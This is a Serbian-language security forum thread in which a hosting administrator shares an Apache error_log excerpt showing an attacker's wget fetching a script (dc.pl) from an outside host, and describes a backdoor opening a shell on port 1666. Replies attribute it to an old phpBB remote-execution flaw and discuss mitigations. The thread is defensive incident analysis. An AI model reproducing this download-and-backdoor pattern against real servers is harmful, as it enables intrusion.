Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

hmmm recimo cudne stvari u error_log-u u apache-u

[es] :: Security :: hmmm recimo cudne stvari u error_log-u u apache-u

[ Pregleda: 3929 | Odgovora: 2 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

gandalf
Goran Raovic
senior network engineer
Belgrade

Član broj: 52
Poruke: 248
*.gradac.net.

Jabber: goran.raovic@gmail.com


+44 Profil

icon hmmm recimo cudne stvari u error_log-u u apache-u10.09.2005. u 12:24 - pre 226 meseci
Naime pre pola stata pogledam kako su mi procesi na jednom serveru i vidim jednu cudnu stvar da imam proces koji se pokrece sa localhost-a i kaci se na neku tamo masinu 212.221.124.* pogledam logove i vidim u apacheovom error_log-u jednu cudnu stvar:
--22:15:26-- http://sex.hotsteamyteens.com/dc.pl
=> `dc.pl.5'
Resolving sex.hotsteamyteens.com... 166.70.135.163
Connecting to sex.hotsteamyteens.com[166.70.135.163]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]

0K 100% 247K

22:15:29 (197.97 KB/s) - `dc.pl.5' saved [759/759]

to mi se nalazi na kraju error-log-a e sada sta mislite kako je ovo izvodljivo da mi radi takav upload na server??? Nasao sam taj fajl (dc.pl) u /var/tmp kao i fajl r0nin koji je verovatno backdoor koji otvara shell na 1666 portu. Tu je dc.pl klijent koji se kaci na njega! Backdoor su mogli da pokrenu pod permisiama www jer se pod tim userom vrti apache ali nisu backdoor-u moglu da pristupe jer je ispred servera firewall koji dozvoljava konekcije samo na portove 80 i 443 tako da :) E sada me interesuje u kojim slucajevima apache upisuje takav sadrzaj u error-log (mislim da obicno to ide u access_log)??? I kako je uopste moguce da su uradili takav upload??
 
Odgovor na temu

stsung
NS

Član broj: 12899
Poruke: 432
*.neobee.net.



+2 Profil

icon Re: hmmm recimo cudne stvari u error_log-u u apache-u10.09.2005. u 18:20 - pre 226 meseci
Pozd.
Verovatno imash stariju verziju phpBB foruma ili neshto slichno. Konkretno za taj forum, bila je pre par meseci greshka koja je omogucavala pokretanje bilo chega pa i toga shto si naveo - pokrenut je wget koji je skinuo fajl sa te adrese i potpm je taj shell script startovan koji je ubacio backdoor. Ubij te procese i obrishi fajlove sa diska, a forum ili ako je neshto drugo u pitanju updatuj.
Svako dobro.

[Ovu poruku je menjao stsung dana 10.09.2005. u 19:21 GMT+1]
 
Odgovor na temu

gandalf
Goran Raovic
senior network engineer
Belgrade

Član broj: 52
Poruke: 248
*.blueisp.co.yu.

Jabber: goran.raovic@gmail.com


+44 Profil

icon Re: hmmm recimo cudne stvari u error_log-u u apache-u10.09.2005. u 19:40 - pre 226 meseci
o.k to sam i pretpostavio da je tako uradjeno ali mi nije bilo jasno otkud log u error_log fajlu a ne u access_log-u ?!@? No to nije ni bitno, problem je sto je to hosting server koji ima jedno 300 prezentacija tako da.... to sto se na serveru nalazi neka php skripta koja je vulnerable mene mnogo se ne tice. Moracu ili da ukljucim safe_mod na on ili sa postavim suphp koliko sutra!!! Jbg. nema mi druge. Na vreme nisam razdvojio i /var/tmp dir na posebnu particiju tako da ne mogu tu da setujem noexec bit tako da...
 
Odgovor na temu

[es] :: Security :: hmmm recimo cudne stvari u error_log-u u apache-u

[ Pregleda: 3929 | Odgovora: 2 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.